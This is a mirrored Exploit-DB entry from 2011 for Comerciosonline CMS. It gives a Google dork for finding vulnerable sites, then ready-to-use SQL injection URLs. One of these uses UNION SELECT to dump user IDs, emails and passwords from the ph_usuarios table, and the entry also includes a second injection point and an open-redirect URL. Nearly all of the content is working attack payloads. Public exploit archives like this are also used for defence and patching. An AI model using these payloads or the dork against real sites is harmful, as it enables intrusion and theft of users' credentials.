exploit-db-mirror/exploits/php/webapps/16060.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

27 lines
No EOL
1 KiB
Text
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Comerciosonline CMS SQLi
# Google Dork: allintext: " Servicio ofrecido por ComerciosOnLine "
# Date: 27/01/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software Link: http://www.comerciosonline.com/index.php?p=8
# Version: All
# Tested on: Linux, Windows
[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
Lezaeta, Nicolas Montanaro, Inyexion, Login-Root, KikoArg, Ricota,
Xarnuz, Truenex
 
 
 
[POC]
http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
 
http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
[SQL Injection]
http://localhost/b2c/index.php?page=pp_productos.php&tbusq=9&codf=17&md=1&codm=-1+UNION+SELECT+1,2--
[URL Redirect]
http://localhost/b2c/anuncioredir.php?id=14&tipobanner=2&redir=http://www.google.com.ar